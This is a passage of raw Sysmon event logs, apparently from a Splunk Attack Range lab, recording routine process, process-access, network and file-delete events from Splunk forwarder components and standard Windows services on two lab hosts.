Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222433Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-1908-6216-3D05-000000003902}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000222432Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.122{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51716-false10.0.1.12-8089- 354300x8000000000000000298599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:46.581{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49545-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:49.778{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=741E1D703E74B6E5CBA34527C4D743AA,SHA256=BAE65A41627CB7EF6D23B0F0377D939652763F52464FDCCF4336D9C8708A23DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:46.637{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51717-false10.0.1.12-8000- 10341000x8000000000000000222461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.822{4F8D34B0-1909-6216-3E05-000000003902}10362492C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1909-6216-3E05-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222456Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222455Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222454Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222453Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222452Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222451Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222450Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1909-6216-3E05-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222449Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1909-6216-3E05-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222448Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.494{4F8D34B0-1909-6216-3E05-000000003902}1036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222447Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.197{4F8D34B0-1908-6216-3D05-000000003902}30761644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222446Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:49.025{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3DE0D65C099C0EEE339BA8A9CBAF09,SHA256=2E0A2738017B7D82363D92DE0958D65C0B0A7A32FA60E14DF595298C21F30808,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:50.798{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5FFD7AB2091980F141362F49D57C82B,SHA256=FF1141B907DB1EB4E6BFF39E3509234DA29F0DC7C94374D524FBB3DB1ADB6047,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:50.119{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2187A3757E3FC8D0C85C6C74B07E1EA2,SHA256=498C50EFEFECA7058C3742FAE17A6D747EEF0D1B45EB96E86414E6433E573CEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:50.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9B3D84DD5624709D5F55E6DC73F1DBD,SHA256=7E0DFE7E9AA978EA9A7A71CAB89402A8E33216E561E867C4BC9374AABA73BFAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:51.815{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACED2275D75E827DB64D4ED18ECD29CD,SHA256=D11572C6B529DB80B6C899B9583A1F32C8515D4EA0D55DC1022BCB1B76A85C1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-190B-6216-3F05-000000003902}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222476Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222475Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222474Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:51.259{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\S